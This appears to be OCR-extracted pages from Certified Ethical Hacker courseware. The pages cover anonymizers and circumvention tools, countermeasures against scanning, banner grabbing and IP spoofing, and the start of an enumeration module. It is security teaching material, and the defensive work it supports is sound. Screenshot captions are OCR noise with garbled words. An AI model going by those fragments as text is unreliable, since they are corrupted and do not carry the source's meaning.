Anonymizers are of two basic types: networked anonymizers and single-point anonymizers. =

Networked Anonymizers A networked anonymizer first transfers your information through a network of Internetconnected computers before passing it on to the website. Because the information passes through several Internet computers, it becomes cumbersome for anyone trying to track your information to establish the connection between you and the anonymizer. Example: If you want to visit any web page, you have to make a request. The request will first pass through A, B, and C Internet computers before going to the website. Advantage: Complication of the communications makes traffic analysis complex. Disadvantage: Any multi-node network communication compromising confidentiality at each node.

=

incurs some

degree of risk of

Single-Point Anonymizers Single-point anonymizers first transfer your information through a website before sending it to the target website and then pass back the information gathered from the target website to you via the website to protect your identity. Advantage: Arms-length information.

communication

hides the IP address

and

related

identifying

Disadvantage: It offers less resistance to sophisticated traffic analysis. Anonymizer tools use various techniques such as SSH, VPN, and HTTP proxies, which allow access to blocked or censored content on the Internet with advertisements omitted.

Module 03 Page 374

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks =

Whonix Source: https://www.whonix.org Whonix is a desktop OS designed for advanced security and privacy. It mitigates the threat of common attack vectors while maintaining usability. Online anonymity is realized via fail-safe, automatic, and desktop-wide use of the Tor network. It consists of a heavily reconfigured Debian base that is run inside multiple virtual machines, providing a substantial layer of protection from malware and IP address leaks.

C)

Edit_view History Bookmarks

Ble

o>

‘you using Tor?

@ B [0 vcheckantoinden

——_—

}



1 check Tor Browser

Tbols Help

.

sr

LS

2 [>

mas

Attribute

Value

[serene eee!

oe

see Asm en

Reverse DUS:

ae

hd

JonDoBrowser provides strong

cod

de | ¥

LEARN MORE about the individual tests performed by the IP Check... Click here!

pee

Rating

d How to we Thunderbirwith

93.115.2412 (Tor) (ON (Click bere fix this eoblem)

Mattar Reconsuistance Tool ‘evercoolae Panoptichck DeAnonymzer

|

Figure 3.101: Screenshot of Whonix

Some additional anonymizers are listed below: =

Psiphon (https://psiphon.ca)

=

TunnelBear (https://www.tunnelbear.com)

=

Invisible Internet Project (I2P) (https://geti2p.net)

=

JonDo (https://anonymous-proxy-servers.net)

Module 03 Page 375

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

Discussed below are various anonymizers for mobile devices:

=

Orbot Source: https://guardianproject.info Orbot is a proxy app that allows other apps to use the Internet more securely. It uses Tor to encrypt Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is a free software that provides an open network to help defend your system against any form of network surveillance that may compromise personal freedom and privacy as well as confidential business activities and relationships through a type of state security monitoring known as “traffic analysis.” Orbot creates a truly private Internet connection. 48%ia 12:20 PM

VPN Mode

bled Apps

¥Y

f©@*

Figure 3.102: Screenshot of Orbot

Module 03 Page 376

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks =

Exam 312-50 Certified Ethical Hacker

Psiphon Pro

Source: https://psiphon.ca Psiphon Pro is a circumvention tool developed by Psiphon, Inc., which uses VPN, SSH, and HTTP proxy technology to provide you with open and uncensored access to Internet content. However, Psiphon Pro does not increase online privacy and is not an online security tool. Features:

o

Browser or VPN (whole-device) mode: one can choose whether to tunnel everything or just the web browser.

©

In-app stats: This lets you know how much traffic you have been using.

Pom P) Psiphon

STATS

OPTIONS

running on port 108¢ P proxy

on port running

VPN service running VPN ti KS run ing Running in whole device mode

Open Browser

Figure 3.103: Screenshot of Psiphon Pro.

Module 03 Page 377

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Censorship Alkasir

|

Exam 312-50 Certified Ethical Hacker

Circumvention

Tools: Alkasir

Alkasir is a cross-platform, open-source, and

robust website censorship circumvention tool

Tails

that also maps censorship patterns around

|

the world

and Tails

C | EH

Tails isa live operating system that a user can start on any computer from a DVD,

USB stick, or SD card

Welcome to Tails!

‘etes/athab. com

https: boun. 0g

Censorship Circumvention Tools =

Alkasir

Source: https://github.com Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool that also maps censorship patterns around the world. Alkasir enables attackers to identify censored links. It keeps them informed about links that are still blocked and links that are not blocked. Eh coop star - 9 x ee ed ee {© Behe = = Noni Opminhcbm =| ® Scnenion =] 27. ironmayfrcmnten “= Obecomet -] & une =| , GE re reconeov PRA... %

Google Search | tm Feeing Lucky Aavnsing ogame

Busnes

Satons Aon Googe

ese OnecT

Front Bed Figure 3.104: Screenshot of Alkasir

Module 03 Page 378

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

Tails Source: https://tails.boum.org Tails is a live OS that users can run on any computer from a DVD drive, USB stick, or SD card. It uses state-of-the-art cryptographic tools to encrypt files, emails, and instant messaging. It allows attackers to use the Internet anonymously and circumvent censorship. It leaves no trace on the computer. Shutdown

Welcome to Tails!

ge & Region Langua

@

EE] Keyboard Layout

English (US)

(37 Formats

United States

Encrypted Persistent Storage

inter your

passphrase to

Additional Settings

unlock the

D Show Passphrase

persist

@

The default settings are safe in most situations. To add a custom setting, press the "+" button below. +

Figure 3.105: Screenshot of Tails

Module 03 Page 379

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

LO#07: Explain Network Scanning Countermeasures

Network Scanning Countermeasures In ethical hacking, the ethical hacker, also known as the “pen tester,” has to perform an additional task that a normal hacker does not follow (i.e., adopting countermeasures against the respective vulnerabilities determined through hacking). This is essential because knowing security loopholes in your network is worthless unless you adopt measures to protect them against real hackers. This section discusses various countermeasures to defend against network scanning attacks.

Module 03 Page 380

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Ping Sweep Countermeasures

if EH

Configure firewalls to detect and prevent ping sweep attemptsinstantaneously Use intrusion detection systems (IDSes) and intrusion prevention systems (IPSes), such as Snortto detect and prevent ping sweep attempts

Carefully evaluate the type of ICMP traffic flowing through enterprise networks Terminate the connection with any host sending more than 10 ICMP ECHO requests Use a DMZand allowonly commandssuch as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDEDin the pmz Limit ICMP traffic with access-control lists (ACLs) to the ISP’s specific IP addresses

Ping Sweep Countermeasures Some countermeasures for preventing ping sweep attempts are as follows: =

Configure the firewall to detect and prevent ping sweep attempts instantaneously.

=

Use intrusion detection systems (IDSes) and intrusion prevention systems (IPSes), such as Snort (https://www.snort.org), to detect and prevent ping-sweep attempts.

=

Carefully evaluate the type of Internet Control Message Protocol (ICMP) traffic flowing through enterprise networks.

=

Terminate the connection with any host sending more than 10 ICMP ECHO requests.

=

Use a demilitarized zone (DMZ) and allow only commands such as ICMP

=

HOST

UNREACHABLE, and TIME

EXCEEDED in the DMZ.

_ECHO_REPLY,

Limit ICMP traffic with access-control lists (ACLs) to the ISP’s specific IP addresses

Module 03 Page 381

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Port Scanning Countermeasures B

Configure

C iE H

firewall and IDS rules to detect and

Use a custom rule set to lock down the network

block probes

and block unwanted ports at the firewall

Run port scanning tools against hostson the network to determine whether the firewall properly detects port scanningactivity

Filter all ICMP messages (i.e., inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers

B

Ensurethat the mechanisms used for routing and filtering at the routersand firewalls, respectively, cannotbe bypassed usinga particular source port or source routing methods Ensurethat the router, IDS, and firewall firmware are updated to their latest releases/versions

Perform TCP and UDP scanning alongwith ICMP probes against your organization’sIP address space to check the network configuration andits available ports 3]

Ensure that anti-scanning and anti-spoofingrules are properly configured

Port Scanning Countermeasures As discussed previously, port scanning provides a large amount of useful information to attackers, such as IP addresses, host names, open ports, and services running on ports. Open ports specifically offer an easy means for an attacker to break into the network. However, there is no cause for concern, provided that the system or network is secured against port scanning by adopting the following countermeasures: Configure firewall and intrusion detection system (IDS) rules to detect and block probes. The firewall should be capable of detecting the probes sent by attackers using portscanning tools. It should not allow traffic to pass through after simply inspecting the TCP header. The firewall should be able to examine the data contained in each packet before allowing traffic to pass through it. Run the port scanning tools against hosts on the network to determine whether the firewall accurately detects the port scanning activity. Some firewalls do a better job than others in terms of detecting stealth scans. For example, many firewalls have specific options for detecting SYN scans, whereas others ignore FIN scans. Ensure

that

the

releases/versions.

router,

IDS,

and

firewall

firmware

are

updated

with

their

latest

Configure commercial firewalls to protect the network against fast port scans and SYN floods. Hackers use tools such as Nmap and perform OS detection to sniff the details of a remote OS. Thus, it is important to employ an IDS in such cases. Snort (https://www.snort.org) is

Module 03 Page 382

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

a very useful intrusion detection and prevention technology, mainly because signatures are frequently available from public authors. =

Keep as few ports open as possible and filter the rest, as an intruder may attempt to enter through any open port. Use a custom rule set to lock down the network, block unwanted ports at the firewall, and filter the following ports: 135-159, 256-258, 389, 445, 1080, 1745, and 3268.

=

Block unwanted services running on the ports and update the service versions.

=

Ensure that the versions of services running on the ports are non-vulnerable.

=

Block inbound ICMP message types and all outbound ICMP type-3 unreachable messages at border routers arranged in front of the company’s main firewall.

=

Attackers attempt to perform source routing and send packets to the targets, which may not be reachable via the Internet, using an intermediate host that can interact with the target. Hence, it is necessary to ensure that the firewall and router can block such sourcerouting techniques.

=

Ensure that the mechanisms used for routing and filtering at the routers and firewalls, respectively, cannot be bypassed using a particular source port or source routing methods.

=

Test the IP address space using TCP and UDP port scans as well as ICMP determine the network configuration and accessible ports.

=

Ensure that the anti-scanning and anti-spoofing rules are configured.

=

Ifa commercial firewall is in use, then ensure the following: o

Itis patched with the latest updates.

o

It has correctly defined anti-spoofing rules.

©

Its fast-mode services are unusable.

probes to

=

Ensure that TCP wrappers limit access to the network based on domain addresses.

=

Test how the network firewall and IDS manages the fragmented packets using fragtest and fragroute.

=

Use proxy servers to block fragmented or malformed packets.

=

Ensure that the firewalls forward open port scans to empty hosts or honeypots to make the port-scanning task difficult and time-consuming.

=

Employ an intrusion prevention system (IPS) to identify port scan attempts and blacklist IP addresses.

Module 03 Page 383

names or IP

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Banner Grabbing

Exam 312-50 Certified Ethical Hacker

Countermeasures

C iE H

Disabling or Changing Banner

Hiding File Extensions from Web Pages

@ Display false bannersto mislead or deceive attackers

® File extensions reveal information about the underlying server technology thatan attackercan utilizeto launch attacks

@ Turnoff unnecessary serviceson the network host to limit the disclosure of information

@

. 7 . . Hide file extensionsto mask the web technologies

© Use server masking tools to disable or change banner = information

a | @ Replace application mappings such as .asp with htm ee, an or .foo, etc. to disguise the .identities of servers

@ ForApache2.x with themod_headers module, use adirectiveinthe httpd.conf file to change the

© Apach . Ore leusers canuse mod_negotiation

bannerinformation header and set the server asNew

Server

irectives

Name

@ IIS users canuse tools such as PageXchanger to manage the file extensions

© Alternatively, changethe ServerSignature line to ServerSignature

Offinthe httpd.conf file

©

itis preferable to not use file extensionsat all

Banner Grabbing Countermeasures Disabling or Changing Banner An open port indicates that a service/banner is running on it. When attackers connect to an open port using banner grabbing techniques, the system presents a banner containing sensitive information such as the OS, server type, and version. Using the information gathered, the attacker identifies specific vulnerabilities to exploit and then launches attacks. The countermeasures against banner grabbing attacks are as follows: o

Display false banners to mislead or deceive attackers.

o

Turn off unnecessary services on the network host to limit information disclosure.

o

Use server masking tools to disable or change banner information.

o

Remove unnecessary HTTP headers and response data and camouflage the server by providing false signatures. This also provides the option of eliminating file extensions such as .asp and . aspx, which clearly indicate that the site is running on a Microsoft

server. o

For Apache 2.x with the mod_headers module, use a directive in the httpd.conf file to change the banner information header and set the server as New Server Name.

o

Alternatively, change the ServerSignature httpd. conf file.

©

Disable the details of the vendor and version in the banners.

o

Modify the value of Server Tokens from Full to Prod in Apache’s httpd. conf file to prevent disclosure of the server version.

Module 03 Page 384

line to ServerSignatureOff in the

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks °

Exam 312-50 Certified Ethical Hacker

Modify the value of RenoveServerHeader from 0 to 1 in the Ur1Scan. ini config file found at C: WindowsSystem32inetservUrlscan. This method prevents

disclosure of the server version.

Trick attackers by modifying the value of AlternateServerName to values such as xyz

Of myserver.

Disable HTTP methods application servers.

such

as

Connect,

Put,

Delete,

and

Options

Remove the X-Powered-By header only with the customHeaders section of the web. config file. =

from

web

option in the

Hiding File Extensions from Web Pages File extensions reveal information about the underlying server technology that an attacker can use to launch attacks. The countermeasures against such banner grabbing attacks are as follows: °

Hide file extensions to mask the web technology.

°

Replace application mappings identities of servers.

°

Apache users can use mod_negotiation

°

IIS users can use tools such as PageXchanger to manage the file extensions.

such

as .asp with

.htm,

.foo, etc. to disguise

the

directives.

Note: It is preferable to not use file extensions at all.

Module 03 Page 385

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

IP Spoofing Detection Techniques: Direct TTL Probes | . |

CEH

Send a packet to the host of a suspected spoofed packet that triggers a reply and compare the TTL with that of the suspected packet; if the TTL in the reply is not the same as the packet being checked, this implies that it is a spoofed packet This technique is successful when the attacker is in a different subnet from that of the victim

‘Sending a packet with spoofed 10.0.0.5 IP—TTL13

Attacker (Spoofed Address 10.0.0.5) 10.0.0.5

IP Spoofing Detection Techniques: IP Identification Number

01

CEH

Send a probe to the host of a suspected spoofed traffic that triggersa reply and compare the IPID with the suspected traffic

02

If the IPIDs are not close in value to the packet being checked, then the suspected trafficis spoofed

03

This technique is considered reliable even if the attacker is in the same subnet Send packet with spoofed IP 10. 0.5; 1P ID 2586 Attacker

(Spoofed Address

100.05)

Module 03 Page 386

Terget

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

IP Spoofing Detection Techniques: TCP Flow Control Method

CE H

|@ Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets

|@ Therefore, attackers cannot respond to a change in the congestion window size |@ When received traffic continues after a window size is exhausted, the packets are most likely spoofed

Sending a SYN packet with spoofed 10.0.0.51P Attacker

(Spoofed Address 10.0.0.5)

IP Spoofing Detection Techniques =

Direct TTL Probes In this technique, you initially send a packet (ping request) to the legitimate host and wait for a reply. Check whether the TTL value in the reply matches with that of the packet you are checking. Both will have the same TTL if they are using the same protocol. Although the initial TTL values vary according to the protocol used, a few initial TTL values are commonly used. For TCP/UDP, the values are 64 and 128; for ICMP, they are 128 and 255. Sending a packet with

spoofed 10.0.0.5 IP - TTL 13 Attacker

(Spoofed Address 10.0.0.5) 7 10.0.0.5 Figure 3.106: IP Spoofing detection technique: Direct TTL Probes

If the reply is from a different protocol, then you should check the actual hop count to detect the spoofed packets. Deduct the TTL value in the reply from the initial TTL value to determine the hop count. The packet is a spoofed packet if the reply TTL does not match the TTL of the packet. It will be very easy to launch an attack if the attacker knows the hop count between the source and the host. In this case, the test result is a false negative.

Module 03 Page 387

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

This technique is successful when the attacker is in a different subnet from that of the victim. Note: Normal traffic from one host can contrast TTLs depending on traffic patterns. =

IP Identification Number Users can identify spoofed packets by monitoring the IP identification (IPID) number in the IP packet headers. The IPID increases incrementally each time a system sends a packet. Every IP packet on the network has a unique "IP identification" number, which is increased by one for every packet transmission. To identify whether a packet is spoofed, send a probe packet to the source IP address of the packet and observe the IPID number in the reply. The IPID value in the response packet must be close to but slightly greater than the IPID value of the probe packet. The source address of the IP packet is spoofed if the IPID of the response packet is not close to that of the probe packet. This method

subnet.

is effective even when

Send packet with

both the attacker and the target are on the same

o>

Attacker

(Spoofed Address 10.0.0.5)

10.0.0.5 Figure 3.107: IP Spoofing detection technique: IP Identification Number

=

TCP Flow Control Method The TCP can optimize the flow control on both the sender’s and the receiver's end with its algorithm. The algorithm accomplishes flow control using the sliding window principle. The user can control the flow of IP packets by the window size field in the TCP header. This field represents the maximum amount of data that the recipient can receive and the maximum amount of data that the sender can transmit without acknowledgement. Thus, this field helps to control data flow. The sender should stop sending data whenever the

window size is set to zero.

In general flow control, the sender should stop sending data once the initial window size is exhausted. The attacker, who is unaware of the ACK packet containing window size information, might continue to send data to the victim. If the victim receives data packets beyond the window size, they are spoofed packets. For effective flow control and early detection of spoofing, the initial window size must be very small. Most spoofing attacks occur during the handshake, as it is challenging to build multiple spoofing replies with the correct sequence number. Therefore, apply the flow control spoofed packet detection method to the handshake. In a TCP handshake, the host sending Module 03 Page 388

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

the initial SYN packet waits for SYN-ACK before sending the ACK packet. To check whether you are getting the SYN request from a genuine client or a spoofed one, set SYN-ACK to zero. If the sender sends an ACK with any data, it means that the sender is a spoofed one. This is because when SYN-ACK is set to zero, the sender must respond to it only with the ACK packet, without additional data. Sending a SYN packet with spoofed 10, Attacker

(Spoofed Address 10.0.0.5)

Target

10.0.0.5 Figure 3.108: IP Spoofing detection technique: TCP Flow Control Method

Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets. Attackers cannot respond to changes in the congestion window size. When the received traffic continues after a window size is exhausted, the packets are most likely spoofed.

Module 03 Page 389

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

IP Spoofing Countermeasures

CE H

@ _ Encrypt all the network traffic using cryptographic network protocols such as IPsec, TLS, SSH, and HTTPS ©

Use multiple firewallsto provide a multi-layered depth of protection Do not rely on IP-based authentication

Use a random initial sequence number to prevent IP spoofing attacks based on sequence number spoofing Ingress Filtering: Use routers and firewalls at your network perimeter to filter incoming packets that appear to come from an internal IP address Egress Filtering: Filter all outgoing packets with an invalid local IP address as the source address

IP Spoofing Countermeasures As mentioned previously, IP spoofing is a technique adopted by a hacker to break into a target network. Therefore, to protect the network from external hackers, IP spoofing countermeasures should be applied in network security settings. Some IP spoofing countermeasures that can be applied are as follows: Avoid Trust Relationships Do not rely on IP-based authentication. Attackers may masquerade as trusted hosts and send malicious packets. If these packets are accepted under the assumption that they are “clean” because they are from a trusted host, malicious code will infect the system. Therefore, it is advisable to test all packets, even when they originate from a trusted host. This problem can be avoided by implementing password authentication along with trust relationship—based authentication. Use Firewalls and Filtering Mechanisms As stated above, all incoming and outgoing packets should be filtered to avoid attacks and loss of sensitive information. A firewall can restrict malicious packets from entering a private network and prevent severe data loss. Access-control lists (ACLs) can be used to block unauthorized access. However, the possibility of an insider attack also exists. Inside attackers can send sensitive information about the business to competitors, which could lead to financial loss and other issues. Another risk of outgoing packets is that an attacker may succeed in installing a malicious sniffing program running in a hidden mode on the network. These programs gather and send all the network information to the attacker without any notification after filtering out the outgoing packets. Therefore, the scanning of outgoing packets must be assigned the same importance as that of incoming packets.

Module 03 Page 390

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks =

Exam 312-50 Certified Ethical Hacker

Use Random Initial Sequence Numbers Most devices choose their initial sequence numbers (ISNs) based on timed counters. This makes the ISNs predictable, as it is easy for an attacker to determine the concept of generating an ISN. The attacker can determine the ISN of the next TCP connection by analyzing the ISN of the current session or connection. If the attacker can predict the ISN, then they can establish a malicious connection to the server and sniff network traffic. To avoid this risk, use random ISNs.

=

Ingress Filtering Ingress filtering prevents spoofed traffic from because it enhances the functionality of Configuring and using ACLs that drop packets range is one method of implementing ingress

=

entering the Internet. It is applied to routers the routers and blocks spoofed traffic. with a source address outside the defined filtering.

Egress Filtering Egress filtering is a practice that aims to prevent IP spoofing by blocking outgoing packets with a source address from the outside.

=

Use Encryption

To maximize network security, use strong encryption for all traffic placed on transmission media without considering its type and location. This is the best method to prevent IP spoofing attacks. IPSec can be used to drastically reduce the IP spoofing risk, as it provides data authentication, integrity, and confidentiality. Encryption sessions should be enabled on the router so that trusted hosts can communicate securely with local hosts. Attackers tend to focus on targets that are easy to compromise. If an attacker desires to break into an encrypted network, they must decrypt the entire slew of encrypted packets, which is a difficult task. Therefore, an attacker is likely to move on and attempt to find another target that is easy to compromise or simply abort the attempt. Moreover, use the latest encryption algorithms that provide strong security. =

SYN Flooding Countermeasures Countermeasures against SYN flooding attacks can also help avoid IP spoofing attacks.

=

Other IP Spoofing Countermeasures o

Enhance the integrity and confidentiality of websites by migrating from IPv4 to IPv6é during development.

o

Implement digital certificate authentication mechanisms such as domain and two-way auth certificate verification.

o

Use a secure VPN while accessing any type of public Internet service such as free WiFi and hotspots.

o

Employ application-specific mitigation devices such as Behemoth scrubbers for deeplevel packet investigation at a high speed of nearly 100 million packets/s.

Module 03 Page 391

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

o

Implement dynamic IPv6 address variation reduce the time of active vulnerability.

o

Configure routers to send encoded information about fragmented packets entering the network.

o

Configure routers to verify the data packets using their signatures by storing the arriving data packet digests.

o

Configure routers to hide intranet hosts from the external network by implementing modifications to the network address translation (NAT).

o

Configure internal switches to table the DHCP spoofed traffic.

Module 03 Page 392

using

a random

address generator to

static addresses to filter malicious

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Scanning Detection and Prevention Tools ExtraHop

It provides complete visibility, real-time detection, and intelligent response to malicious network scanning

CE H Q:|

Fi,j2

Splunk Enterprise Security etps://wrr splunk.com — Scanlogd

esrftabcom Vectra Cognito Detect etps://arrw.vectro.0

ZQ _ BM Security QRadar XDR ‘tts: //www.bm.com

Cynet 360 ttosif/www.cynet.com https/jwurw extrahop com Copyright © by

Scanning Detection and Prevention Tools Security professionals use various sophisticated tools such as ExtraHop and Splunk Enterprise Security to detect active networks and port scanning attempts initiated by attackers.

=

ExtraHop Source: https://www.extrahop.com ExtraHop provides complete visibility, real-time detection, and intelligent response to malicious network scanning. This tool allo ws security professionals to automatically discover and identify every device and its vulnerabilities, including unmanaged Internet of things (loT) devices in a network. Further, this tool allows security professionals to analyze all network interactions in real time, including all cloud transactions and SSL/TLS

encrypted traffic, to provide complete visibility inside the network perimeter. ExtraHop also assists in the auto-discovery and classification of every device network, using which security teams can ana lyze all communication.

Module 03 Page 393

in the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

peauation | Rv

Exam 312-50 Certified Ethical Hacker

Overview Dashboards Detections Security Network Perimeter

Active Devices

NewDevcs

280

Alerts Asets Records Packets

n

©

ERR +0 erate ExecutiveReport

™...

0

Network Health Indicators Network Health Indicators re ns ons une une

Figure 3.109: Screenshot of ExtraHop

Some of the additional scanning detection and prevention tools are listed below:

=

Splunk Enterprise Security (https://www.splunk.com)

=

Scanlogd (https://github.com)

=

Vectra Cognito Detect (https://www.vectra.ai)

=

IBM Security QRadar XDR (https://www.ibm.com)

=

Cynet 360 (https://www.cynet.com)

Module 03 Page 394

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Module Summary Q

CE H

In this module, we have discussed the following:

> Howattackers discover live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts bs

> Howattackers perform different scanning techniques to determine open ports, services, service versions, etc. on the target system > Howattackers perform banner grabbing or OS fingerprintingto determine the operating system runningon a remote target system

> Various scanning techniques that attackers can employto bypass IDS/firewallrules and logging mechanisms, and disguise themselvesas regular network traffic

> Network scanning countermeasures to defend against network scanning attacks C1 In thenext module, we will discussin detail how attackers, as well as ethical hackersand pen-testers, perform enumeration to collectinformation abouta target before an attack or audit

Module Summary This module discussed how attackers determine live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts. It also described how attackers perform different scanning techniques to determine open ports, services, service versions, etc., on the target system. Furthermore, it explained how attackers perform banner grabbing or OS fingerprinting to determine the OS running on a remote target system. It also illustrated various scanning techniques that attackers can adopt to bypass IDS/firewall rules and logging mechanisms and hide themselves as usual under network traffic. Finally, it ended with a detailed

discussion on network scanning countermeasures to defend against network scanning attacks. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-

testers perform enumeration to collect information about a target before an attack or audit.

Module 03 Page 395

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C'EH

EC-Council

Certified |) Ethical Hacker

————

MODULE 04 ENUMERATION

EC-COUNCIL OFFICIAL CURRICULA

————

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

CEH

LEARNING LO#01: Explain Enumeration Concepts © LO#02: Demonstrate Different Techniques for NetBIOS Enumeration © LO#03: Demonstrate Different Techniques for SNMP Enumeration © LO#04: Use Different Techniques for LDAP Enumeration

OBJECTIVES

© LO#05: Use Different Techniques for NTP and NFS Enumeration © LO#06: Demonstrate Different Techniques for SMTP and DNS Enumeration © LO#07: Demonstrate IPsec, VoIP, RPC, Unix/Linux, Telnet, FTP, TFTP, SMB, IPV6, and BGP Enumeration © LO#08: Explain Enumeration Countermeasures Copyright © by

Strictly Prohibited

Learning Objectives In the previous modules, you learned about footprinting and network scanning. This module covers the next phase, enumeration. We start with an introduction to enumeration concepts. Subsequently, the module provides insight into different techniques for Network Basic Input/Output System (NetBIOS), Simple Network Management Protocol (SNMP), Lightweight Directory Access Protocol (LDAP), Network Time Protocol (NTP), Network File System (NFS), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), Internet Protocol Security (IPsec), Voice over Internet Protocol (VoIP), remote procedure call (RPC), Linux/Unix, Telnet, File Transfer Protocol (FTP), Trivial FTP (TFTP), Server Message Block (SMB), Internet Protocol version 6 (IPv6), and Border Gateway Protocol (BGP) enumeration. The module ends with an overview of

enumeration countermeasures.

At the end of this module, you will be able to: =

Describe enumeration concepts

=

Explain different techniques for NetBIOS enumeration

=

Explain different techniques for SNMP enumeration

=

Explain different techniques for LDAP and active directory (AD) enumeration

=

Explain different techniques for NTP enumeration

=

Explain different techniques for NFS enumeration

=

Explain different techniques for SMTP and DNS enumeration

=

Explain other enumeration techniques such as IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP,

TFTP, SMB, IPv6, and BGP enumeration

=

Apply enumeration countermeasures

Module 04 Page 399

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Enumeration

C/EH

LO#01: Explain Enumeration Concepts

Copyright © by

Al Rights Reserved. Reproductionis Stricty Prohibited

Enumeration Concepts Different sections of this module deal with the enumeration of different services and ports. Before discussing the actual enumeration process, we introduce concepts related to enumeration.

Module 04 Page 400

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

What is Enumeration?

CE H Information Enumerated by Intruders

@

Enumeration involvesan attacker creatingactive connections witha target system and performing directed queries to gain



more information about the target

‘Attackers use the extracted information to identify points for

a system attack and perform password attacks to gain unauthorized accessto information system resources

@

iy

Networkshares

ro

Routing tables

%

Audit and service settings

a

are conducted in anintranet Enumeration techniques

environment

Network resources

SNMP and FQDN details

ie

Machine names

&

Users and groups

Applications and banners

What is Enumeration? Enumeration is the process of extracting usernames, machine names, network resources, shares,

and services from a system or network. In the enumeration phase, an attacker creates active connections with the system and sends directed queries to gain more information about the target. The attacker uses the information collected using enumeration to identify vulnerabilities in the system security, which help them exploit the target system. In turn, enumeration allows the attacker to perform password attacks to gain unauthorized access to information system resources. Enumeration techniques work in an intranet environment. In particular, enumeration allows the attacker to collect the following information: =

Network resources

=

Network shares

=

Routing tables

=

Audit and service settings

=

SNMP and fully qualified domain name (FQDN) details

=

Machine names

=

Users and groups

=

Applications and banners

During enumeration, attackers may stumble upon a remote inter-process communication (IPC) share, such as IPCS in Windows, which they can probe further to connect to an administrative share by brute-forcing admin credentials and obtain complete information about the file-system listing that the share represents. Module 04 Page 401

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

